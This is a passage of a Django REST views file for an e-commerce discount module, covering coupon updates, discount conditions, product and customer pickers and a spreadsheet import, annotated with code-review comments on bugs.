                    #                 elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)])
                    if objproduct_list:
                        # print("=====objproduct_list=====", objproduct_list)
                        #-------Binayak start 12-03-2021------#\
                        prooduct_id_list = []
                        for prod in objproduct_list:
                            if prod:
                                # Each entry is a comma-separated id string.
                                prod = prod.split(',')
                                # prev_products = list(prev_products.split(","))
                                # print("=====prev_products=====", prev_products)
                                # print("=====prev_products=====", type(prev_products))
                                prooduct_id_list.extend(prod)
                        # print("=====prooduct_id_list=====", prooduct_id_list)
                        prooduct_id_list = list(map(int, prooduct_id_list))
                        # if prooduct_id_list:
                        #     elastic = common.update_bulk_elastic('EngageboostProducts', prooduct_id_list,
                        #                                          'channel_currency_product_price', 'update', warehouse)
                        #-------Binayak end 12-03-2021------#
                        # for elastic_product_id in objproduct_list:
                        #     if(elastic_product_id is not None):
                        #         try:
                        #             if("," in elastic_product_id):
                        #                 prod_lst = elastic_product_id.split(",")
                        #                 elastic = common.update_bulk_elastic('EngageboostProducts',prod_lst,'channel_currency_product_price','update', warehouse)
                        #             else:
                        #                 print("=====in here 5=====")
                        #                 elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update', warehouse)
                        #         except:
                        #             print("=====in here 6=====")
                        #             elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update', warehouse)
                        # Deferred re-sync: a queue worker picks this row up later.
                        EngageboostUpdateQueue.objects.create(discount_id=pk,
                                                              process_type='single',
                                                              operation_for='discount',
                                                              prev_warehouses=prev_warehouses)
                    return Response(data)
                else:
                    data ={
                        'status':0,
                        'api_status':serializer.errors,
                        'message':'Data Not Found',
                    }
                    return Response(data)
        else:
            # Multi-coupon: update the master, then merge the supplied coupon list.
            d1= request.data['value']
            d2 = request.data['multiple_coupons']
            # NOTE(review): d1 is immediately overwritten — the first assignment is dead.
            d1={'modified':datetime.datetime.now()}
            serializer_data=dict(has_multy,**d1)
            serializer = DiscountMasterSerializer(dis,data=serializer_data,partial=True)
            if serializer.is_valid():
                latest = serializer.save()
                if product_id_qty:
                    product_id_qtys = product_id_qty.split(",")
                    if len(product_id_qtys)>0:
                        EngageboostDiscountFreebieMappings.objects.filter(discount_master_id=latest.id).delete()
                        for item in product_id_qtys:
                            pro_qty = item.split("@")
                            current_date = datetime.datetime.now(datetime.timezone.utc).astimezone()
                            EngageboostDiscountFreebieMappings.objects.create(discount_master_id=latest.id,product_id=pro_qty[0],qty=pro_qty[1],created=current_date,modified=current_date)
                # NOTE(review): the loop variable shadows the outer `is_mul` flag.
                for is_mul in d2:
                    cnt= EngageboostDiscountMastersCoupons.objects.using(company_db).filter(coupon_code=is_mul['coupon_code']).filter(~Q(discount_master_id=pk)).count()
                    if cnt ==0:
                        # NOTE(review): .date() is stored into `modified` here, unlike the
                        # datetime used elsewhere — confirm the column type.
                        User = EngageboostDiscountMastersCoupons.objects.using(company_db).create(website_id=has_multy['website_id'],discount_master_id=pk,coupon_code=is_mul['coupon_code'],modified=datetime.datetime.now().date())
                        data ={
                            'status':1,
                            'api_status':'',
                            'message':'Successfully Updated',
                        }
                    else:
                        data ={
                            'status':0,
                            'api_status':'',
                            'message':'Coupon code is already exists',
                        }
                return Response(data)
            else:
                data ={
                    'status':0,
                    'api_status':serializer.errors,
                    'message':'Data Not Found',
                }
                return Response(data)
# Set discount conditions(Insert new records)
# Save discount data after save condition by cds on 11th Oct 2019
class DiscountConditions(generics.ListAPIView):
    """Replace the condition rows of a discount master and queue product re-sync."""
    def post(self, request, format=None):
        """Delete the existing conditions for ``discount_master_id`` and recreate them.

        Computes the product ids matched by the old and new condition sets
        (include/exclude by product or by category) so affected products can be
        queued in EngageboostUpdateQueue for downstream re-sync.
        """
        datas=[]
        company_db = loginview.db_active_connection(request)
        discount_master_id=request.data['discount_master_id']
        warehouse = EngageboostDiscountMasters.objects.filter(id=discount_master_id).values_list('warehouse_id',
                                                                                                 flat=True)
        prev_products = list(EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id = discount_master_id).values_list('all_product_id',flat=True))
        prev_conditions = EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id=discount_master_id).all()
        prev_pro_ids = []
        new_pro_ids = []
        # if cnt >0:
        if prev_conditions:
            # Resolve the OLD condition set to concrete product ids:
            # '==' conditions include, anything else excludes.
            prev_conditions_serializar = DiscountConditionsSerializer(prev_conditions, many=True)
            prev_conditions_serializar = prev_conditions_serializar.data
            product_in_arr = []
            product_out_arr = []
            for ind_pre_cond in prev_conditions_serializar:
                if ind_pre_cond["all_product_id"]:
                    product_id_array = ind_pre_cond["all_product_id"].split(",")
                    if ind_pre_cond["condition"] == "==":
                        product_in_arr = product_in_arr + product_id_array
                    else:
                        product_out_arr = product_out_arr + product_id_array
                elif ind_pre_cond["all_category_id"]:
                    # Category conditions expand to every product in the categories.
                    category_id_array = ind_pre_cond["all_category_id"].split(",")
                    find_category_products = EngageboostProductCategories.objects.filter(category_id__in=category_id_array).values_list('product_id', flat= True).distinct()
                    find_category_products = list(find_category_products)
                    if ind_pre_cond["condition"] == "==":
                        product_in_arr = product_in_arr + find_category_products
                    else:
                        product_out_arr = product_out_arr + find_category_products
            prev_pro_ids = list(set(product_in_arr) - set(product_out_arr)) #product_in_arr-product_out_arr
        # Full replace: wipe old rows, then insert the posted condition list.
        EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id=discount_master_id).delete()
        has_multy=request.data['value']
        for data in has_multy:
            # Manual id assignment: next id = current max + 1 (1 when table empty).
            # NOTE(review): race-prone under concurrent inserts — confirm acceptable.
            has_record = EngageboostDiscountMastersConditions.objects.using(company_db).last()
            if has_record:
                last_entry_of_table = EngageboostDiscountMastersConditions.objects.order_by('-id').latest('id')
                row_id = int(last_entry_of_table.id)+int(1)
            else:
                row_id = 1
            d1={"id":row_id};
            data=dict(data,**d1)
            # datas.append(data)
            # serializer = DiscountConditionsSerializer(data=data,partial=True)
            serializer = EngageboostDiscountMastersConditions.objects.using(company_db).create(**data)
        # objproduct_list = EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id = discount_master_id).values_list('all_product_id',flat=True)
        # New
        # Resolve the NEW condition set to product ids with the same include/exclude logic.
        new_conditions = EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id=discount_master_id).all()
        new_conditions_serializar = DiscountConditionsSerializer(new_conditions, many=True)
        new_conditions_serializar = new_conditions_serializar.data
        new_product_in_arr = []
        new_product_out_arr = []
        for ind_pre_cond in new_conditions_serializar:
            if ind_pre_cond["all_product_id"]:
                product_id_array = ind_pre_cond["all_product_id"].split(",")
                if ind_pre_cond["condition"] == "==":
                    new_product_in_arr = new_product_in_arr + product_id_array
                else:
                    new_product_out_arr = new_product_out_arr + product_id_array
            elif ind_pre_cond["all_category_id"]:
                category_id_array = ind_pre_cond["all_category_id"].split(",")
                find_category_products = EngageboostProductCategories.objects.filter(category_id__in=category_id_array).values_list('product_id', flat= True).distinct()
                find_category_products = list(find_category_products)
                if ind_pre_cond["condition"] == "==":
                    new_product_in_arr = new_product_in_arr + find_category_products
                else:
                    new_product_out_arr = new_product_out_arr + find_category_products
        new_pro_ids = list(set(new_product_in_arr) - set(new_product_out_arr)) #product_in_arr-product_out_arr
        # End New
        # Every product touched by either the old or the new condition set.
        diff_ids = prev_pro_ids + new_pro_ids
        final_arr = list(set(diff_ids))
        objproduct_list = prev_pro_ids # It is static. Checking for testing purpose
        # if final_arr :
        #     for elastic_product_id in final_arr:
        #         if(elastic_product_id != "" and elastic_product_id is not None):
        #             elastic_product_id = str(elastic_product_id)
        #             if (elastic_product_id.find(',') != -1):
        #                 prod_lst = elastic_product_id.split(",")
        #                 for prod_id in prod_lst:
        #                     if(prod_id!=""):
        #                         elastic = common.save_data_to_elastic(int(prod_id),'EngageboostProducts')
        #             else:
        #                 elastic = common.save_data_to_elastic(int(elastic_product_id),'EngageboostProducts')
        if final_arr:
            # for elastic_product_id in final_arr:
            #     if(elastic_product_id != "" and elastic_product_id is not None):
            #         print('Hello', elastic_product_id)
            #         try:
            #             if("," in elastic_product_id):
            #                 prod_lst = elastic_product_id.split(",")
            #                 elastic = common.update_bulk_elastic('EngageboostProducts',prod_lst,'channel_currency_product_price','update')
            #             else:
            #                 elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update')
            #         except:
            #             elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update')
            prooduct_id_list = []
            # print("======final_arr=======", final_arr)
            for prev_prov in final_arr:
                # NOTE(review): `type(prev_prov) == 'str'` compares a type object to a
                # string literal and is always False, so every entry takes the append
                # branch — confirm `isinstance(prev_prov, str)` was intended.
                if type(prev_prov) == 'str':
                    prev_prov = prev_prov.split(',')
                    prooduct_id_list.extend(prev_prov)
                else:
                    prooduct_id_list.append(prev_prov)
            prooduct_id_list = list(map(int, prooduct_id_list))
            warehouse_lists = []
            if prooduct_id_list:
                for warehouse_ids in warehouse:
                    # print('======warehouse======', warehouse_ids)
                    warehouse_lists.extend(list(map(int, list(warehouse_ids.split(',')))))
                # warehouse = list(map(int, list(warehouse)))
                prev_pro_ids = list(map(str, prev_pro_ids))
                # Deferred re-sync: a queue worker picks this row up later.
                EngageboostUpdateQueue.objects.create(discount_id=discount_master_id,
                                                      process_type='single',
                                                      operation_for='discount',
                                                      prev_products=", ".join(prev_pro_ids))
                #
                # elastic = common.update_bulk_elastic('EngageboostProducts', prooduct_id_list,
                #                                      'channel_currency_product_price',
                #                                      'update', warehouse_lists)
        # NOTE(review): `serializer` holds the last create() result (a model instance),
        # so it has no `.errors`; the else branch would raise, and `serializer` is
        # unbound when the posted list is empty — confirm the payload is never empty.
        if serializer:
            # serializer.save()
            data ={
                'status':1,
                'api_status':'',
                'message':'Successfully Inserted',
            }
        else:
            data ={
                'status':0,
                'api_status':serializer.errors,
                'message':'Data Not Found',
            }
        return Response(data)
        # return Response(datas)
# Set discount conditions Get single row and update
class DiscountConditionsSet(generics.ListAPIView):
    """Read API for the condition rows attached to one discount master."""

    def get_object(self, pk, request):
        """Return a single EngageboostDiscountMastersConditions row or 404.

        :param pk: primary key of the condition row.
        :param request: current request (used to resolve the tenant DB).
        """
        company_db = loginview.db_active_connection(request)
        try:
            return EngageboostDiscountMastersConditions.objects.using(company_db).get(pk=pk)
        except EngageboostDiscountMastersConditions.DoesNotExist:
            raise Http404

    def get(self, request, pk, format=None, many=True):
        """List every condition row for discount master ``pk``.

        Fix over the original: the response was wrapped in ``if(serializer)``
        with an else-branch reading ``serializer.errors`` — a serializer
        instance is always truthy and ``.errors`` is invalid before
        ``is_valid()``, so that branch was unreachable dead code and has
        been removed.
        """
        company_db = loginview.db_active_connection(request)
        conditions = EngageboostDiscountMastersConditions.objects.using(company_db).filter(
            discount_master_id=pk)
        serializer = DiscountConditionsSerializer(conditions, many=True)
        return Response({'Rows': serializer.data})
# Fetch All CustomerGroup Record for page load web services
class CustomerGroupDiscount(generics.ListAPIView):
    # NOTE(review): the first positional parameter is named ``request`` but
    # receives ``self`` when invoked as an instance method — confirm intent.
    def get_object(request, discount_master_id, format=None):
        """Return one condition row for the given discount master or 404."""
        company_db = loginview.db_active_connection(request)
        try:
            return EngageboostDiscountMastersConditions.objects.using(company_db).get(discount_master_id=discount_master_id)
        except EngageboostDiscountMastersConditions.DoesNotExist:
            raise Http404
    def get(self, request,discount_master_id, format=None,many=True):
        """Paginated customer list plus the discount's saved conditions and
        the grid-layout definition of the Customers list screen.

        Search/order parameters come from ``request.data`` (search key,
        order_by field, order_type '+'/'-').
        """
        company_db = loginview.db_active_connection(request)
        # pk=request.data.get('pk')
        user = EngageboostDiscountMastersConditions.objects.using(company_db).all().filter(discount_master_id=discount_master_id)
        serializer = DiscountConditionsSerializer(user,many=True)
        #####################Query Generation#################################
        # NOTE(review): ``last_sku`` in the customer search filters below
        # looks like a typo for ``last_name`` — verify against the model.
        if request.data.get('search') and request.data.get('order_by'):
            key=request.data.get('search')
            order_by=request.data.get('order_by')
            order_type=request.data.get('order_type')
            if(order_type=='+'):
                order=order_by
            else:
                order='-'+order_by
            result = EngageboostCustomers.objects.using(company_db).all().order_by(order).filter(Q(first_name__icontains=key)|Q(last_sku__icontains=key)|Q(email__icontains=key))
        elif request.data.get('search'):
            key=request.data.get('search')
            result = EngageboostCustomers.objects.using(company_db).all().order_by('-id').filter(Q(first_name__icontains=key)|Q(last_sku__icontains=key)|Q(email__icontains=key))
        elif request.data.get('order_by'):
            order_by=request.data.get('order_by')
            order_type=request.data.get('order_type')
            if(order_type=='+'):
                order=order_by
            else:
                order='-'+order_by
            result = EngageboostCustomers.objects.using(company_db).all().order_by(order)
        else:
            result = EngageboostCustomers.objects.using(company_db).all().order_by('-id')
        # NOTE(review): excluding the customer whose pk equals the *discount*
        # id looks copied from another view — confirm this filter is intended.
        result=result.filter(~Q(pk=discount_master_id)).filter(isblocked='n',isdeleted='n')
        #print(request.data.get('search'))
        page = self.paginate_queryset(result)
        #####################Query Generation#################################
        #####################Layout#################################
        # NOTE(review): when ``page`` is None this method implicitly returns
        # None — confirm pagination is always configured for this view.
        if page is not None:
            serializer_product = CustomerSerializer(page, many=True)
            module='Customers'
            screen_name='list'
            layout_fetch=EngageboostGridLayouts.objects.using(company_db).get(module=module,screen_name=screen_name)
            # Header/field definitions are "@@"-delimited strings in the DB.
            layout_header=layout_fetch.header_name.split("@@")
            layout_field=layout_fetch.field_name.split("@@")
            layout_check=EngageboostGridColumnLayouts.objects.using(company_db).filter(module=module,screen_name=screen_name).count()
            layout={}
            layout_arr=[]
            for header,field in zip(layout_header,layout_field):
                # Fields may be dotted ("parent.child"): split into top-level
                # field name and optional child accessor.
                ex_layout_field=field.split(".")
                field_name=ex_layout_field[0]
                if len(ex_layout_field)>1:
                    child_name=ex_layout_field[1]
                else:
                    child_name=''
                if(layout_check):
                    # A saved column layout exists: a column is shown only if
                    # its header appears in the saved header string.
                    layout_column_fetch=EngageboostGridColumnLayouts.objects.using(company_db).get(module=module,screen_name=screen_name)
                    layout_column_header=layout_column_fetch.header_name
                    layout_column_field=layout_column_fetch.field_name
                    if header in layout_column_header:
                        status=1
                    else:
                        status=0
                else:
                    status=1
                layout={"title":header,"field":field_name,"child":child_name,"show":status}
                layout_arr.append(layout)
            #####################Layout#################################
            pre_data={}
            final_data=[]
            pre_data['result']=serializer_product.data
            pre_data['layout']=layout_arr
            pre_data['discount']=serializer.data
            final_data.append(pre_data)
            return self.get_paginated_response(final_data)
# Fetch All Category Record for page load web services
class CategoryLoed(APIView):
    def get(self, request, format=None):
        """Return every active top-level (parent_id=0) category.

        Fix over the original: the else-branch referenced an undefined
        ``serializer`` variable (NameError) and could never run anyway,
        because a serializer instance is always truthy — the success
        response is now returned directly.
        """
        company_db = loginview.db_active_connection(request)
        categories = EngageboostCategoryMasters.objects.using(company_db).filter(
            isdeleted='n', isblocked='n', parent_id=0).order_by('-id')
        category = CategoriesSerializer(categories, many=True)
        return Response({
            'status': 1,
            'category': category.data,
        })
# select chield category for parent category
class Getchild_category(APIView):
    def post(self, request, format=None):
        """Return the immediate child categories of ``category_id`` as JSON."""
        company_db = loginview.db_active_connection(request)
        parent_id = request.data['category_id']
        children = EngageboostCategoryMasters.objects.using(company_db).filter(parent_id=parent_id)
        payload = [{"id": child.id, "name": child.name} for child in children]
        return HttpResponse(json.dumps({"category": payload, "status": 1}),
                            content_type='application/json')
class ProductLoad(generics.ListAPIView):
    """List up to 100 active products, optionally filtered by a search key."""

    @staticmethod
    def _serialize(products):
        # Flatten the queryset into the minimal dict shape the UI expects.
        return [{'id': p.id, 'name': p.name, 'sku': p.sku,
                 'default_price': p.default_price} for p in products]

    def post(self, request, format=None, many=True):
        """Return ``{'product': [...]}`` (or ``{'product': ''}`` when a
        search matches nothing — legacy contract preserved).

        Fixes over the original: the search and no-search branches were
        near-duplicates and both left ``order`` undefined (NameError) when
        ``order_type`` was neither '+' nor '-'; ordering now defaults to
        descending and the serialization is shared.
        """
        company_db = loginview.db_active_connection(request)
        order_by = request.data['order_by']
        order_type = request.data['order_type']
        # '+' means ascending; anything else descends on order_by.
        order = order_by if order_type == '+' else '-' + order_by
        qs = EngageboostProducts.objects.using(company_db).filter(
            isblocked='n', isdeleted='n')
        key = request.data['search']
        if key:
            qs = qs.filter(Q(name__icontains=key) | Q(sku__icontains=key) |
                           Q(default_price__icontains=key))
            if not qs.exists():
                # Legacy contract: empty string (not []) when nothing matches.
                return Response({'product': ''})
        result = qs.order_by(order)[:100]
        return Response({'product': self._serialize(result)})
class ProductLoadPaging(generics.ListAPIView):
    # """ List all products from web services """
    def post(self, request, format=None,many=True):
        """Paginated product picker for cross-sell selection: up to 100
        active products in the same category as ``product_id`` that have no
        existing cross-sell link.

        NOTE(review): the EngageboostCossSellProducts / ProductCategories
        queries below do not use ``.using(company_db)`` — presumably they
        should hit the tenant DB like the product queries; confirm.
        """
        company_db = loginview.db_active_connection(request)
        #####################Query Generation#################################
        #print('Chkardahr Sahoo')
        key = ''
        if request.data['search']:
            key = request.data['search']
        order_type = request.data['order_type']
        order_by = request.data['order_by']
        product_id = request.data['product_id']
        # NOTE(review): ``order`` stays unbound (NameError later) when
        # order_type is neither '+' nor '-'.
        if(order_type=='+'):
            order = order_by
        elif(order_type=='-'):
            order = '-'+order_by
        parentProduct = EngageboostCossSellProducts.objects.values('product_id').filter(~Q(product_id=product_id))
        # print("Parents",parentProduct)
        ownchildProduct = EngageboostCossSellProducts.objects.values('cross_product_id').filter(~Q(product_id=product_id))
        # print("Childs",ownchildProduct,ownchildProduct.query)
        proObj = EngageboostProducts.objects.using(company_db).filter(isblocked='n',isdeleted='n').filter(~Q(id=product_id)).values('id')
        product_ids = []
        if proObj.count()>0:
            result = proObj.all()
            for item in result:
                # Keep only products with no cross-sell link (either
                # direction) to any product other than the reference one.
                check = EngageboostCossSellProducts.objects.filter(Q(product_id=item['id'])|Q(cross_product_id=item['id'])).filter(~Q(product_id=product_id))
                if check.count()==0:
                    product_ids.append(item['id'])
        proObj = EngageboostProducts.objects.using(company_db).filter(id__in=product_ids)
        # Restrict to the (last) category of the reference product.
        # NOTE(review): ``catProduct`` may be None if the reference product
        # has no active category row — AttributeError below; confirm.
        catProduct = EngageboostProductCategories.objects.filter(isblocked='n',isdeleted='n',product_id=product_id).last()
        sameCatProduct = EngageboostProductCategories.objects.filter(isblocked='n',isdeleted='n',category_id=catProduct.category_id).values('product_id')
        proObj = proObj.filter(id__in=sameCatProduct)
        if key != '':
            proObj = proObj.filter(Q(name__icontains=key)|Q(sku__icontains=key)|Q(default_price__icontains=key))
        # print(proObj.query)
        cnt = proObj.count()
        # NOTE(review): when cnt != 0 but ``page`` is None the method
        # implicitly returns None — confirm pagination is always configured.
        if cnt !=0:
            result = proObj.all().order_by(order)[:100]
            page = self.paginate_queryset(result)
            arr=[]
            if page is not None:
                serializer_product = EngageboostProductsSerializer(page, many=True)
                serializer_product = serializer_product.data
                for product in serializer_product:
                    data ={
                        'id':product['id'],
                        'name':product['name'],
                        'sku':product['sku'],
                        'default_price':product['default_price']
                    }
                    arr.append(data)
                return self.get_paginated_response(arr)
        else:
            data2 = {
                "result":[]
            }
            return Response(data2)
# Customer group web services for Discount Setup Load
class CustomerLoed(APIView):
    def get(self, request, format=None):
        """Return every active customer group ordered by name.

        Fix over the original: the else-branch referenced an undefined
        ``serializer`` variable (NameError) and was unreachable, because a
        serializer instance is always truthy — the success response is now
        returned directly.
        """
        company_db = loginview.db_active_connection(request)
        groups = EngageboostCustomerGroup.objects.using(company_db).filter(
            isdeleted='n', isblocked='n').order_by('name')
        customer = CustomerGroupSerializer(groups, many=True)
        return Response({
            'status': 1,
            'customer': customer.data,
        })
class CustomerType(generics.ListAPIView):
    """List up to 100 active customer groups, optionally name-filtered."""

    def post(self, request, format=None, many=True):
        """Return ``{'customergrp': [...]}`` (or ``{'customergrp': ''}``
        when a search matches nothing — legacy contract preserved).

        Fixes over the original: the search and no-search branches were
        near-duplicates and both left ``order`` undefined (NameError) when
        ``order_type`` was neither '+' nor '-'; ordering now defaults to
        descending and the row building is shared.
        """
        company_db = loginview.db_active_connection(request)
        order_by = request.data['order_by']
        order_type = request.data['order_type']
        # '+' means ascending; anything else descends on order_by.
        order = order_by if order_type == '+' else '-' + order_by
        qs = EngageboostCustomerGroup.objects.using(company_db).filter(
            isblocked='n', isdeleted='n')
        key = request.data['search']
        if key:
            qs = qs.filter(name__icontains=key)
            if not qs.exists():
                # Legacy contract: empty string (not []) when nothing matches.
                return Response({'customergrp': ''})
        result = qs.order_by(order)[:100]
        rows = [{'id': group.id, 'name': group.name} for group in result]
        return Response({'customergrp': rows})
class DiscountCustomer(generics.ListAPIView):
    """List up to 100 active customers, searchable by first name or email."""

    def post(self, request, format=None, many=True):
        """Return ``{'customer': [...]}`` (or ``{'customer': ''}`` when a
        search matches nothing — legacy contract preserved).

        Fixes over the original: the search and no-search branches were
        near-duplicates and both left ``order`` undefined (NameError) when
        ``order_type`` was neither '+' nor '-'; ordering now defaults to
        descending and the row building is shared.
        """
        company_db = loginview.db_active_connection(request)
        order_by = request.data['order_by']
        order_type = request.data['order_type']
        # '+' means ascending; anything else descends on order_by.
        order = order_by if order_type == '+' else '-' + order_by
        qs = EngageboostCustomers.objects.using(company_db).filter(
            isblocked='n', isdeleted='n')
        key = request.data['search']
        if key:
            qs = qs.filter(Q(first_name__icontains=key) | Q(email__icontains=key))
            if not qs.exists():
                # Legacy contract: empty string (not []) when nothing matches.
                return Response({'customer': ''})
        result = qs.order_by(order)[:100]
        rows = [{'id': c.id, 'first_name': c.first_name,
                 'last_name': c.last_name, 'email': c.email} for c in result]
        return Response({'customer': rows})
class CategoriesListDiscount(generics.ListAPIView):
    # """ Categories Selected """
    #///////////////////Fetch Single Row
    def get(self, request, pk, format=None):
        """Return root categories plus, for condition row ``pk``, each saved
        category id resolved into up to four ancestry levels
        (category_1 = topmost ancestor ... category_4 = deepest)."""
        company_db = loginview.db_active_connection(request)
        Categories = EngageboostCategoryMasters.objects.using(company_db).all().filter(isdeleted='n',isblocked='n',parent_id=0).order_by('-id')
        Category = CategoriesSerializer(Categories, many=True)
        child_id=EngageboostDiscountMastersConditions.objects.using(company_db).get(id=pk)
        # all_category_id is a comma-separated id string; 'None' means unset.
        if str(child_id.all_category_id)!='None':
            all_categories=child_id.all_category_id.split(',')
            all_categories = [int(numeric_string) for numeric_string in all_categories]
            all_categories.sort()
            arr2=[]
            for child in all_categories:
                child_id1 = EngageboostCategoryMasters.objects.using(company_db).filter(id=child,isdeleted='n',isblocked='n')
                if child_id1.count() > 0:
                    child_id1 = child_id1.first()
                    # Walk up the parent chain (max four levels) so the saved
                    # category lands at the correct depth slot.
                    # NOTE(review): if an ancestor row is blocked/deleted the
                    # inner ``if child_count... > 0`` has no else, leaving
                    # category_1..4 unbound -> NameError at data_parent; confirm.
                    if child_id1.parent_id != 0:
                        child_count1=EngageboostCategoryMasters.objects.using(company_db).filter(id=child_id1.parent_id,isdeleted='n',isblocked='n').count()
                        if child_count1 > 0:
                            child_id2=EngageboostCategoryMasters.objects.using(company_db).get(id=child_id1.parent_id,isdeleted='n',isblocked='n')
                            if child_id2.parent_id!=0:
                                child_count2=EngageboostCategoryMasters.objects.using(company_db).filter(id=child_id2.parent_id,isdeleted='n',isblocked='n').count()
                                if child_count2 >0:
                                    child_id3=EngageboostCategoryMasters.objects.using(company_db).get(id=child_id2.parent_id,isdeleted='n',isblocked='n')
                                    if child_id3.parent_id!=0:
                                        child_count2=EngageboostCategoryMasters.objects.using(company_db).filter(id=child_id3.parent_id,isdeleted='n',isblocked='n').count()
                                        if child_count2 >0:
                                            child_id4=EngageboostCategoryMasters.objects.using(company_db).get(id=child_id3.parent_id,isdeleted='n',isblocked='n')
                                            category_1=child_id4.id
                                            category_2=child_id3.id
                                            category_3=child_id2.id
                                            category_4=child_id1.id
                                    else:
                                        category_1=child_id3.id
                                        category_2=child_id2.id
                                        category_3=child_id1.id
                                        category_4=0
                            else:
                                category_1=child_id2.id
                                category_2=child_id1.id
                                category_3=0
                                category_4=0
                    else:
                        category_1=child_id1.id
                        category_2=0
                        category_3=0
                        category_4=0
                    data_parent={"category_1":category_1,"category_2":category_2,"category_3":category_3,"category_4":category_4}
                    arr2.append(data_parent)
            return HttpResponse(json.dumps({"parent_child":arr2,'category':Category.data}), content_type='application/json')
        else:
            data_parent=[{"category_1":0,"category_2":0,"category_3":0,"category_4":0}]
            return HttpResponse(json.dumps({"parent_child":data_parent,'category':Category.data}), content_type='application/json')
class CatrgoryConditionsSet(generics.ListAPIView):
    # Category list (all depths) for the discount-coupon condition editor.
    def get(self, request, format=None, many=True):
        """Return every active category.

        Fix over the original: the else-branch referenced an undefined
        ``serializer`` variable (NameError) and was unreachable, because a
        serializer instance is always truthy — the success response is now
        returned directly.
        """
        company_db = loginview.db_active_connection(request)
        categories = EngageboostCategoryMasters.objects.using(company_db).filter(
            isdeleted='n', isblocked='n')
        category = CategoriesSerializer(categories, many=True)
        return Response({'category': category.data})
class ImportFileDiscounts(generics.ListAPIView):
    def post(self, request, format=None):
        """Store an uploaded discount-import xls under a randomised name and
        return its header row plus the root category list for field mapping."""
        company_db = loginview.db_active_connection(request)
        datas = []
        db_fields = []
        product_path = 'discounts'
        module_id = 1
        temp_model = 'TempDiscount'
        model = 'Discount'
        filepath = 'importfile'
        post_data = request.data
        if 'import_file' in request.FILES:
            # Random number + timestamp avoids name collisions between uploads.
            rand = str(random.randint(1,99999))
            file1 = request.FILES['import_file']
            file_name=file1.name
            ext = file_name.split('.')[-1]
            time_stamp = str(int(datetime.datetime.now().timestamp()))
            new_file_name='DiscountImport_'+rand+time_stamp
            fs=FileSystemStorage()
            filename = fs.save(filepath+'/'+product_path+'/'+new_file_name+'.'+ext, file1)
            uploaded_file_url = fs.url(filename)
            BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
            csvReader = xlrd.open_workbook(settings.BASE_DIR+uploaded_file_url)
            sheet = csvReader.sheet_by_name('Sheet1')
            headers = [str(cell.value) for cell in sheet.row(0)]
            # Reshape the header list as {name: name} for the mapping UI.
            headers = {k: k for k in headers}
            #********* List Of Parent Category *********#
            category_lists = []
            category_cond = EngageboostCategoryMasters.objects.using(company_db).all().filter(website_id=post_data['website_id'],parent_id=0,isblocked="n",isdeleted="n").order_by('name')
            if category_cond:
                category_list = CategoriesSerializer(category_cond,many=True)
                category_lists = category_list.data
            else:
                category_lists = []
            datas = {"category_list":category_lists,"filename":new_file_name+'.'+ext,"xls_header":headers}
        # When no file was posted this returns the initial empty list.
        return Response(datas)
class SaveFileDiscounts(generics.ListAPIView):
    def post(self, request, format=None):
        """Parse the previously uploaded discount xls and stage every data
        row into EngageboostTempDiscountMasters for preview/confirmation.
        Returns {"status": 1|0, "filename": ..., ["errors": ...]} and always
        deletes the uploaded file when it existed.
        """
        company_db = loginview.db_active_connection(request)
        product_path = 'discounts'
        module_id = 1
        temp_model = 'TempDiscount'
        model = 'Discount'
        filepath = 'importfile'
        datas = []
        custom_field_datas=[]
        post_data = request.data
        # map_fields = post_data["map_fields"]
        # Read xls Data
        fs=FileSystemStorage()
        filename = filepath+'/'+product_path+'/'+post_data["filename"]
        uploaded_file_url = fs.url(filename)
        BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        if os.path.exists(BASE_DIR):
            csvReader = xlrd.open_workbook(settings.BASE_DIR+uploaded_file_url)
            sheet = csvReader.sheet_by_index(0)
            length=len(sheet.col_values(0))
            xls_column_header_info = []
            xls_column_info={}
            row_no_in_xls= sheet.ncols
            # max_column = sheet.ncols
            # NOTE(review): each d11 merge overwrites the same two keys, so
            # xls_column_header_info ends up holding a single dict describing
            # only the LAST column — presumably a list of per-column dicts
            # was intended; confirm.
            for x in range(length):
                if x==0:
                    for i in range(row_no_in_xls):
                        d11 ={"column_name":sheet.col_values(i)[x],"column_number":i}; xls_column_info=dict(xls_column_info,**d11)
                    xls_column_header_info.append(xls_column_info)
                else:
                    pass
            for x in range(length):
                if x==0:
                    pass
                else:
                    # Manual id allocation from the current max id.
                    # NOTE(review): these two queries omit .using(company_db)
                    # unlike the create() below — confirm tenant DB intent.
                    has_record = EngageboostTempDiscountMasters.objects.last()
                    if has_record:
                        last_entry_of_table = EngageboostTempDiscountMasters.objects.order_by('-id').latest('id')
                        row_id = int(last_entry_of_table.id)+int(1)
                    else:
                        row_id = 1
                    serializer_data={}
                    CF_serializer_data={}
                    custom_field_list=[]
                    d2 = {}
                    d1 = {"id":row_id,"website_id":post_data['website_id'],"file_name":post_data['filename']};
                    serializer_data=dict(serializer_data,**d1)
                    # NOTE(review): the normalisation below (discount_type,
                    # coupon_type, dates, ...) sits INSIDE the per-column
                    # loop, so accessing d2 keys that are not mapped yet
                    # raises KeyError and the bare ``except KeyError`` below
                    # silently truncates the row mapping — confirm whether it
                    # was meant to run after the loop.
                    try:
                        for xls_column_header in xls_column_header_info:
                            coupon_type = ""
                            disc_type = ""
                            column_name = str(xls_column_header["column_name"])
                            column_name = column_name.strip()
                            column_number = xls_column_header["column_number"]
                            field_value = sheet.col_values(column_number)[x] if sheet.col_values(column_number)[x] else None
                            # Map the spreadsheet header to its model field.
                            # NOTE(review): ``keyword`` stays unbound if the
                            # first column name is unrecognised -> NameError
                            # at d2.update; later unrecognised columns reuse
                            # the previous keyword.
                            if column_name=="Discount Name":
                                keyword = "name"
                            if column_name=="Discount Description":
                                keyword = "description"
                            if column_name=="Discount Type":
                                keyword = "discount_type"
                            if column_name=="Apply Per/Fixed":
